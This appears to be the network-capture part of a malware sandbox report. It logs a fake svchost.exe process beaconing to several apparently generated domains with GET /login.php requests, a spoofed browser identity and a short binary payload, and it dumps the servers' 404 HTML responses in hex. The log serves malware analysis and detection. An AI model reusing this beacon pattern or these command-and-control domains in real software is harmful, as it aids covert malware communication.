Aug 23, 2024 18:49:00.121284008 CEST	1236	IN	Data Raw: 30 7d 2e 64 6f 6d 61 69 6e 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 Data Ascii: 0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}#plBanner{margin:0px 0px 20px 0px;width:100%;height:140px;text-align:center}.nc-img{w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	56398	85.17.31.122	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:49:00.285015106 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	56399	154.212.231.82	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:49:00.763436079 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:49:01.672589064 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:49:01 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:49:01.674352884 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:49:02.104231119 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:49:01 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49654	188.114.96.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:47:02 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:47:02 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:47:02 UTC	761	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:47:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9W2LPnI%2FmslKKxs3EOeWkxA5EJ5Ee0hsx49puHp4udNgQWXUwT4jBNZ26XWZRal3IhTXEMZExz0v2z0uFjm8vzKIYnCviToMj1rvtVV5ZwNFRn%2FSe8%2FMkoOh5f%2BDTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c9506ab12c326-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:47:02 UTC	608	IN	Data Raw: 37 63 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:47:02 UTC	1369	IN	Data Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe
2024-08-23 16:47:02 UTC	1369	IN	Data Raw: 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 Data Ascii: .fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(f
2024-08-23 16:47:02 UTC	1369	IN	Data Raw: 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b Data Ascii: e:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){
2024-08-23 16:47:02 UTC	1369	IN	Data Raw: 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73 Data Ascii: ='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-s
2024-08-23 16:47:02 UTC	1369	IN	Data Raw: 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 Data Ascii: ht:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2
2024-08-23 16:47:02 UTC	1369	IN	Data Raw: 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 Data Ascii: 0404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta {line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover ,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page
2024-08-23 16:47:02 UTC	1369	IN	Data Raw: 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 Data Ascii: ngle-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post
2024-08-23 16:47:02 UTC	1369	IN	Data Raw: 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 Data Ascii: focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49661	188.114.96.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:47:04 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:47:04 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:47:05 UTC	759	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:47:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2FiBHz1heGVZxchx3O08cZeZiPF8xkUf9Kj6hBDnm0aimNVpIWumT5JEOU0Ap93qO6Nd%2FeVLYEwIKkbbx2TAHKhOiukZG6X0ir15M3I%2Fu6xI4rF2CEHDkzVAXPXZNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c95161e647d0c-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:47:05 UTC	610	IN	Data Raw: 37 63 62 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb9<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:47:05 UTC	1369	IN	Data Raw: 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 67 79 Data Ascii: title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qegy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	51114	188.114.97.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:47:17 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-08-23 16:47:17 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:47:19 UTC	897	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:47:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="98.5",amp_style_sanitizer;dur="34.1",amp_tag_and_attribute_sanitizer;dur="37.1",amp_optimizer;dur="24.4" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CI3bpSNHDFuGNYd0oJ4jHNzvNm3TPa3FbKdcEidsTuDrpD4IjMpHhhbfmuTgeW7J%2BuGSLPcXxIiDjJqwisfGAm9QFBvubWP2cNcsOKSg59owJaPtUmcr%2F4CZygYnVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c9565cf78422b-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:47:19 UTC	472	IN	Data Raw: 37 63 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c30<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" 